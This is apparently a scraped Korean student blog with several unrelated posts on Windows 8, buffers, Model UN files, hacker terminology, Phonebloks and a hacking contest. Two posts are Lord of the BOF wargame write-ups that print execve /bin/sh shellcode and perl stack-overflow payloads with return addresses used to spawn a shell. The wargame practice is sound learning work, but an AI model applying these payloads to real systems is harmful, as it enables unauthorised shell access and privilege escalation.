반응형

안녕하세요, 에버토끼입니다.

요즘 검색어를 보니 윈도우 8에 대한 검색이 많더라구요.

그래서 오늘은 윈도우 8 특집(?) 입니다!


특집이라고 할건 없구요, 

가장 자주 들어오는 검색어 두개에 대해 포스팅을 해보겠습니다.


1)윈도우7이 가벼운가 윈도우8이 가벼운가


결론부터 말하자면, 윈8이 더 가볍습니다. 윈도우 8의 목적은, 요즘 세상 트렌드(?)에 따라 스마트 기기들에 실행가능한 운영체제입니다. 말하자면, 타블렛같은 기기들에서 사용가능한 OS말이죠. 이런 기기들은 아시다시피, 많이 발달했다고는 하나 그래도 컴퓨터에 비해서는 아직 부족한건 사실입니다. 하지만 컴퓨터와 타블렛에 둘다 돌아가게 하기 위해 윈도우 8은 가볍게 만들어졌습니다. 윈도우 7도 가볍긴 한데, 솔직히 저는 두 os의 빠르기 차이를 별로 못느낍니다. 부팅은 빨리 되더라고요.

+)윈8은 타블렛용인지라, 터치스크린이 없는 노트북으로 쓸 경우에 좀 불편한 면이 있습니다. 앱들도 대부분 터치가 필요한 앱들도 많더라고요..


2) 윈도우8 시작메뉴 만들기 


윈도우의 새 시작메뉴때문에 고생하시는 분들이 많으시더라구요. 아무래도 오랫동안 익숙해지던게 없어지다 보니 말이죠.. 근데 삼성에서는 이걸 배려(?)차원으로 시작메뉴를 지원해줍니다. 윈도우 8.1에서는 버튼도 생겼던데 말이죠.  근데 얘는 단점이 삼성컴퓨터에서밖에 안됩니다. 

(사진은 업로드가 느린 관계로 올리지 않습니다)

1) 시작메뉴에서 아무것도 누르지 않고 'SW Update'를 입력하신 후, 뜨는 프로그램을 누릅니다.

2)프로그램을 실행시키고 처음 나오는 절차를 밟습니다.

3)업데이트가 진행될 것이 있으면 진행하신 후, 오른쪽에 있는 All Software탭을 누릅니다.

4)'Quick Starter'를 찾으신 후, 클릭하면 위의 화면이 바뀌는데 왼쪽 아래의 'Install'버튼을 누릅니다.

5)설치가 됩니다. 그리고 다른 편의기능들도 받고싶으시면 받으시면 됩니다.

6)끝!


넴..이상입니다 :)

반응형
저작자표시

'KOREAN > ' 카테고리의 다른 글

About the IB.  (0) 2017.03.19
어떻게 시작해야하는지 모르겠을때  (0) 2013.11.18
'버퍼'란 무엇인가?  (5) 2013.10.08
[윈7/윈8] cmd 'telnet' 명령어 활성화시키기  (3) 2013.09.12
반응형

/* 1. gremlin으로 로그인 하고 난 뒤 내용물을 봅시다.*/

[gremlin@localhost gremlin]$ ls -al

total 156

drwx------    2 gremlin  gremlin      4096 Oct 26 16:06 .

drwxr-xr-x   25 root     root         4096 Mar 30  2010 ..

-rw-------    1 gremlin  gremlin      8903 Oct 26 11:39 .bash_history

-rw-r--r--    1 gremlin  gremlin        24 Feb 26  2010 .bash_logout

-rw-r--r--    1 gremlin  gremlin       230 Feb 26  2010 .bash_profile

-rw-r--r--    1 gremlin  gremlin       124 Feb 26  2010 .bashrc

-rwxr-xr-x    1 gremlin  gremlin       333 Feb 26  2010 .emacs

-rw-r--r--    1 gremlin  gremlin      3394 Feb 26  2010 .screenrc

-rwxrwxr-x    1 gremlin  gremlin     11883 Oct 26 03:31 a.out

-rw-rw-r--    1 gremlin  gremlin       291 Oct 25 22:40 cobalt.c

-rwsr-sr-x    1 cobolt   cobolt      11970 Feb 26  2010 cobolt

-rw-r--r--    1 gremlin  gremlin       291 Mar 29  2010 cobolt.c

-rw-------    1 gremlin  gremlin     61440 Oct 25 22:41 core

-rwxrwxr-x    1 gremlin  gremlin     11842 Oct 26 16:06 getenv

-rw-rw-r--    1 gremlin  gremlin        97 Oct 26 16:05 getenv.c

-rw-rw-r--    1 gremlin  gremlin       143 Oct 26 03:31 whereis.c


COBOLT:

[gremlin@localhost gremlin]$ cat cobolt.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - cobolt

        - small buffer

*/


int main(int argc, char *argv[])

{

    char buffer[16];

    if(argc < 2){

        printf("argv error\n");

        exit(0);

    }

    strcpy(buffer, argv[1]);

    printf("%s\n", buffer);

}

/*버퍼가 작습니다. 여기서 메모리는 '버퍼 16바이트, sfp 4바이트, 리턴어드레스 4바이트'로 이루어져있다고 가정할수 있습니다.*/


/* 2. export명령어로 환경변수를 만듭니다. 여기서 print문도 꼭 포함하셔야 합니다*/

[gremlin@localhost gremlin]$ export GREMLIN=`perl -e 'print"\x6a\x0b\x58\x99\x5

2\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`


/* 3. env명령어로 환경변수가 잘 들어갔는지 봅니다.*/

[gremlin@localhost gremlin]$ env

PWD=/home/gremlin

REMOTEHOST=192.168.0.1

HOSTNAME=localhost.localdomain

LESSOPEN=|/usr/bin/lesspipe.sh %s

USER=gremlin

LS_COLORS=

MACHTYPE=i386-redhat-linux-gnu

MAIL=/var/spool/mail/gremlin

INPUTRC=/etc/inputrc

BASH_ENV=/home/gremlin/.bashrc

GREMLIN=j

         X셊h//shh/bin됥RS됣?  //굿

LANG=en_US

LOGNAME=gremlin

SHLVL=2

USERNAME=

SHELL=/bin/bash

HOSTTYPE=i386

HISTSIZE=1000

OSTYPE=linux-gnu

TERM=ansi

HOME=/home/gremlin

PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/gremlin/bin

COBOLT=j

        X셊h//shh/bin됥RS됣?

_=/usr/bin/env


/* 4. 환경변수의 주소를 알아냅니다.*/

[gremlin@localhost gremlin]$ cat getenv.c

#include <stdio.h>

int main(int argc, char *argv[]){

printf("%p\n",getenv(argv[1]));

return 0;

}

[gremlin@localhost gremlin]$ ./getenv GREMLIN

0xbffffee7 //이게 리턴어드레스가 됩니다


/* 5. 필요한 양의 nop를 넣고 리턴어드레스를 넣습니다.*/

[gremlin@localhost gremlin]$ ./cobolt `perl -e 'print"\x90"x20, "\xe7\xfe\xff\x

bf"'`

릱릱릱릱릱릱릱릱릱릱澳

풺ash$ my-pass


역시 이번에도 달고나 문서가 많은 도움이 되었습니다.

기본은 조금씩 감이 잡히네요. 그래서 그런지 지난번보다는 덜 헤맨것같아요.


NOTES:

GREMLIN=  0xbffffee7

"\xe7\xfe\xff\xbf"'`

buffer=16

nop 20, ret 4


반응형
저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

wolfman->darkelf  (0) 2013.11.21
orc->wolfman  (0) 2013.11.21
goblin->orc  (0) 2013.11.20
cobolt->goblin  (0) 2013.11.01
gate->gremlin  (0) 2013.10.27
반응형

LoB를 풀으시기 전에 꼭 이 링크로 들어가 버퍼오버플로우 문서를 꼭 읽으시기 바랍니다. 엄청난 도움을 주거든요.

http://wowhacker.com/board.php?bid=174&bs_type=&bs_str=&cate=0&pg=0&mode=view&uid=154748


   LoB 설명/파일 받는곳


그럼, 바로 풀이해보겠습니다.



gate로 로그인 한 후에, ls -al을 하니 파일들이 보입니다. (a.out 과 gramlin.c는 무시하셔도 됩니다)

우선 레벨 이름이 gremlin이니 gremlin.c를 구경해보겠습니다.

달고나 문서를 열심히 보셨다면 낯익으실겁니다. 66쪽쯤을 참고하였는데요, 

버퍼는 256바이트이고, 더미는 없으니 바로 sfp 4바이트와 리턴어드레스 4바이트가 있을테니 260바이트를 쉘코드와 NOP로 채우고, 리턴어드레스를 넣는 방법을 시도했습니다.

(쉘코드는 제가 작성하지 않았습니다)


 


릱릱! 이게 쉘코드를 땄을때의 화면입니다.

저는 펄로 했지만 파이썬도 똑같아요 -e 대신 -c를 사용하고, 곱셈부호대신 *를 사용하고, 쉽표대신 +를 쓴다는게 다르지만..

모두들 재밌는 lob하십쇼ㅋㅋ


풀이중 제가 적은 노트:

Shellcode=23 bytes

그러므로 NOP는 237bytes

esp=0xbffffd7c

"\x7c\xfd\xff\xbf"


반응형
저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

wolfman->darkelf  (0) 2013.11.21
orc->wolfman  (0) 2013.11.21
goblin->orc  (0) 2013.11.20
cobolt->goblin  (0) 2013.11.01
gremlin->cobolt  (0) 2013.10.30
반응형

Policy statement, Opening speech, Resolution 예제입니다.

카피라잇으로 가겠습니다. 저만의 창작물이 아니거든요.

그리고, 모든 모의유엔은 기준이 다르니 그냥 참고만 하시길 바랍니다.


Opening Speech.docx


PolicyStatement_Ending impunity of violence against women and girls.docx


PolicyStatement_Restructuring of the Security Council.docx


PolicyStatement_Sustaining media freedom and accountability.docx


PolicyStatement_Working to end the presence and spread of illegal mining activities in Sub-Saharan Africa.docx


Resolution Mali.docx


Resolution Mali2.docx


반응형
저작자표시

'ARCHIVE > 학교' 카테고리의 다른 글

[영어]To Kill a Mockingbird Formative Essay  (0) 2014.04.01
[과학]The effect of salt on ice lab report  (0) 2013.12.02
[영어]The Necklace by Guy Demaupassant 정리  (0) 2013.09.12
[수업] 게임개발  (1) 2013.05.17
[수업] 과학수업시간..  (2) 2013.05.16
반응형

안녕하세요,

요즘 왕늅늅 기본을 위한 시스템 문서들을 읽어보고있는데 음 느끼는게..

'버퍼'(Buffer)를 이해 잘 못하시는분들이 많은것같더라구요.

버퍼는, 쉽게 말하자면, 버스같다고 비유를 할께요.

사용자의 입력을 '버퍼'라는 버스에 태워서 컴퓨터에 전달해주는, 뭐 그런 역할인거죠. 연결다리라고도 볼 수 있겠지만, 버퍼는 왔다갔다하니까요.

아, 그리고 물론 꼭 사용자의 입력만 받는것은 아니랍니다. '데이터'를 운반해주는 것이죠.

이정도면 버퍼에 대해서는 이해가 가셨나요? 간단합니다ㅋㅋ 그렇다면 버퍼링도 한번 살펴봅시다.

 

'버퍼링'이라는 말 들어보셨죠?

동영상 같은것의 스트리밍 서비스는, 버퍼가 쉴새없이(?) 인터넷을 타고 가서 서버에서 동영상의 조각조각을 들고오기때문에 가능하다고 볼 수 있겠습니다. 직설적으로 얘기하자면 그냥 동영상을 실시간으로 받으면서 플레이하는거죠.

여러분들은 불과 10년전만 해도 버퍼링을 시도때도없이 보셨을껍니다. 하지만, 요즘은 버퍼링이 보이지 않죠? 요즘 초등학생들은 뭔지 모른다더구요. 

버퍼링은, 동영상을 조금씩 받아오며 사용자가 바로바로 플레이 할 수 있게 해주는 서비스입니다. 만약에 버퍼가 빠르다면, 더 여러번 왔다갔다하며 더 많은 양의 동영상을 단시간내에 가져올 수 있겠죠? 그럴수록 컴퓨터에 쌓이는 동영상의 양이 단시간 내에 많아지고 동영상은 끊김없이 계속 플레이될 수 있죠. 요즘은 한국의 인터넷이 빨라 버퍼도 빨리 움직여 동영상을 빨리 받아오기 때문에 요즘은 한국에서 버퍼링을 보지 못하는 것입니다. 아직도 외국에 나오면, 버퍼링 많이보입니다. 동영상도 제대로 플레이되지 않고요. 인터넷이 나빠 버퍼가 동영상 재생속도를 따라오지 못해서 생기는 일이랍니다.


이정도면 버퍼의 개념이 이해가셨나요?
질문이나 지적이 있으시다면 33910509@cyworld.com 네이트온으로 말씀해주시기 바랍니다!

반응형
저작자표시

'KOREAN > ' 카테고리의 다른 글

About the IB.  (0) 2017.03.19
어떻게 시작해야하는지 모르겠을때  (0) 2013.11.18
윈도우 7 vs 윈도우 8  (0) 2013.10.31
[윈7/윈8] cmd 'telnet' 명령어 활성화시키기  (3) 2013.09.12
반응형

가지고 있을 가치가 있는 핸드폰.
-스마트폰 같은 전자기기는 한 부품만 고장나도 모두 버리게 되죠. 왜냐구요? 교체하는것은 너무 많은 돈과 

시간이 들기 때문이죠. 분명 문제는 하나의 부품이고 나머지는 멀쩡한데, 버리는 사람들이 많으니 요즘 전자기기들의 쓰레기는 기하급수적으로 늘어나고 있습니다.

그것을 해결하기 위해 나타난 핸드폰입니다.

레고같이 모든 부품들이 블럭으로 되어 있어, 탈부착이 가능한 핸드폰.

모든 블럭은 핸드폰의 기판에 연결됩니다.

이것으로, 자신만의 폰을 개발할 수도 있고, 원하는 기능만 넣을 수도 있습니다.

한 부품이 고장나면, 폰을 바꿀 필요 없이 그 부품만 바꾸면 되는 것이죠.

자신만의 부품을 개발할 수도 있고, 더 좋은 부품을 사 쉽게 집에서도 조립할 수 있습니다.

핸드폰 악세사리도 새로 사서 낄 필요도 없습니다.


어때요, 좋은 아이디어 아닌가요?

위의 홈페이지에 들어가 돕고,

9월 29일에 블로그 포스트/ 페이스북을 통해 이 아이디어를 전세계에 알리는겁니다.

폰블락은 모든 핸드폰 제조사들이 도와줘야 비로소 완성될 핸드폰이거든요.

모두들 도웁시다 :)

반응형
저작자표시

'KOREAN > 뻘글' 카테고리의 다른 글

추억의 예능프로그램들..  (0) 2013.11.27
Phonebloks- A phone worth keeping (1)  (0) 2013.11.02
크래커와 해커의 차이  (0) 2013.09.15
블로그란 무엇인가  (0) 2013.08.19
걍 오늘 끄적여본 아이디어들..  (1) 2013.05.21
반응형

여러분들은 '해커'하면 무엇이 떠오르시나요.

악의적으로 시스템에 침입해 파일들을 손상시키고 가는 사람?

바이러스를 유포해 컴퓨터를 망가트리는 사람?

죄송하지만, 해커는 위의 부류에 속하지 않습니다.


1) 해커란.,

<위키백과>: 해커(영어: hacker, 문화어: 컴퓨터열중자, 컴퓨터침해자, 지능범죄자)는 해킹을 하는 사람이라는 뜻으로, 컴퓨터 전반, 특히 정보 보안에 능통한 전문가를 가리킨다.

해커라는 낱말 자체는 선악(善惡)의 개념을 담지 않은 가치중립적 의미를 가지고 있으나 '컴퓨터 지식을 이용하여 남의 정보 체계에 침입하거나 범죄를 저지르는 사람'이라는 부정적인 뜻으로 많이 쓰이고 있다. 일부 컴퓨터 전문가 공동체에서는 해커가 부정적인 의미로 쓰이는 것은 잘못이며, 컴퓨터 지식을 이용해 불법을 저지르는 사람을 크래커라고 불러야 한다고 주장한다. 


<위키백과 미러> 해킹을 하는 사람으로서 끈질기다는 의미가 있다고 한다. 사실 보통 일반인이 생각하는 해커는 해커중에서도 범죄를 일으키는 크래커이며, 해커는 좀 더 포괄적인 의미로 쓰인다. 어떻게 보면 양자 모두를 아우른다는 점에서 '컴퓨터 전문가' 쪽에 더 가깝다고 할수 있다. 참고로 최초의 해커들은 컴퓨터 관련 사람들이 아니라 MIT의 철도동호회였다고 한다


이처럼, 해커는 불법적인 일을 저지르는 사람이 아닌, 오히려 컴퓨터에 능통하며 관심이 많은 사람들을 지칭하는 단어입니다. 많은 분들이 알고 계시는 해커의 의미는 실제 해커보다는 크래커에 가깝습니다. 악의적인 일들을 하고, 사용자들한테 나쁜 영향을 끼치는 사람들이죠.


2) 현대의 해커

현대의 해커들은 나쁜 인식이 박혀있습니다. 요즘에 일어나는 해킹사건들 때문일 수도 있고, '해커'의 단어가 주는 기분일지도 모릅니다. 그래서 요즘은 '크래커'로 인식을 바꾸기 보다는, 해커를 세 분류로 나눕니다.

    -블랙 해커

취약점을 찾아 공격하는, '크래커'입니다. 이 사람들은, 취약점을 찾아 제보하는것이 아니라, 재미로, 아니면 돈을 뜯어내려고 공격을 하죠. 크래킹은 다 블랙해커들이 한다고 보면 되겠네요.

   -그레이 해커

취약점을 찾지만, 그것을 회사에게 알림으로써 패치할 수 있게 만들고, 돈을 버는 하나의 '직업'입니다. 취약점을 찾아 솔루션을 개발한뒤 회사에게 신고하면 대가들 받는거죠. 악의적인 목적은 없습니다. '블랙해커'과 '화이트해커'를 합침으로써 취약점을 찾기는 하지만 악의적인 목적이 없다는것을 의미합니다.

  -화이트 해커

흔히 말하는 보안전문가분들이십니다. 블랙해커를 막는 역할을 하십니다. 보안에 신경을 쓰시는 분들이죠. 이분들 중에서도 취약점을 찾으시는 분들도 많지만 제보해 돈을 버는게 아니라 그것을 패치하는 역할을 하십니다. 


-하나 더하자면, 현대에 정보기술이 많은 연령층에 도달하면서, 생긴 분류도 있습니다. 바로 '스크립트 키디'라는 것이죠. 툴키드, 툴키디로도 많이 불리고 있으며, 많은 사람들의 나쁜 시선을 받습니다.

그 이유는, 스크립트 키디(Script kiddie)는 소스 조금 읽는다고 자랑하고 오만하고 다니며, 실제로 할 줄 아는것은 별로 없는 사람들을 칭하며, 툴키드, 툴키디(Tool kidie)는 요즘 생긴 명칭으로써 툴을 악의적인 목적으로 사용하며 해킹을 잘한다고 오만하고 다니고, 컴퓨터를 모르는 사람들에게 막 공격을 퍼붓는, 그런 사람들이라고 보면 되겠습니다. 하지만, 지금 정보보안을 공부하고 있는 많은 학생들은 툴키디에서 깨달음을 얻고 그때부터 공부를 하기 시작한 사람들도 있으시다고 하니 그리 나쁜것은 아니겠지요.


※요즘은 '해커'보다도 '햇'으로 넘어가고 있는 추세입니다. 블랙햇, 그레이햇, 화이트햇으로 말이죠. 영어로는 맞지만, 한국에서 현재로썬 정확하게 나온 답이 없습니다. 오히려, 화이트 해커를 착한해커라고 불러야 한다는 주장이 나오고 있죠.

아무튼, 이 글로 인해 해커의 인식이 조금이라도 바뀌길 바랍니다 :)

반응형
저작자표시

'KOREAN > 뻘글' 카테고리의 다른 글

Phonebloks- A phone worth keeping (1)  (0) 2013.11.02
Phonebloks- A phone worth keeping  (0) 2013.09.16
블로그란 무엇인가  (0) 2013.08.19
걍 오늘 끄적여본 아이디어들..  (1) 2013.05.21
걍 그야말로 개소리랄까. 신기술멍멍.  (1) 2013.05.17
반응형

많은 분들이 화이트햇 문제 풀이때문에 오시는데, 제가 아는 풀이있는 사이트들은

http://wecall.tistory.com/135

http://blackcon.tistory.com/category/Virtual%20World/CTF

이 두곳입니다.

저는 풀이가 없는데 자꾸들어오시니.. 원하시는 정보를 여기서 찾으시지 못해 죄송할 따름입니다ㅠㅠ 풀이는 위의 링크로 가주세요.

2013년 9월 7일, 국정원과 국방부가 여는 화이트햇 콘테스트의 예선이 열렸습니다.

이제는 전설이죠.. 어려워서 전설이 되어버린 대회..ㅋㅋ

일반부와 청소년부의 대회가 같이 진행되었어요.

링크:http://whitehatcontest.ls-al.org/

이번 대회는.. 많은 사람들이 이것때문에.. 참가했겠죠?

흐어....ㄷㄷㄷ.....ㄷㄷㄷㄷㄷ..........엄청나요


문제풀이 페이지는 이렇게 생겼었습니다.


문제는 요로코롬 생겼습니다. 최종순위는 모르겠지만, 제가 마지막으로 접속한 시간의 랭킹은 아래와 같았습니다. 부정확한점 사과드립니다..ㅠㅠ 이제는 여기 인터넷이 나쁜건지 표시를 안하는건지 뜨지 않네요..

최종 순위입니다. 일반부에서는 20명이 뽑혔지만 청소년부에는 14명 밖에 뽑히지 않았다고 하네요.

본선에서도 모두들 화이팅입니다!




풀이보고 멘붕했습니다.

ㅎ..ㅎㅎ...ㅎ.ㅎㅎㅎ..ㅎ............

아 저는 워게임이나 열심히 풀어야겠습니다.

흑...


반응형
저작자표시

'ARCHIVE > CTF 후기 & 풀이' 카테고리의 다른 글

Ghost In The Shellcode 2014 후기  (1) 2014.01.27
Layer7 제 4회 Hacking Festival 후기  (0) 2013.09.07
제 1회 JuniorCTF 후기  (0) 2013.08.03
NewHeart 제 2회 청소년 화이트해커 경진대회 2013 후기  (4) 2013.05.23
PicoCTF 2013 후기  (6) 2013.05.23

+ Recent posts

티스토리툴바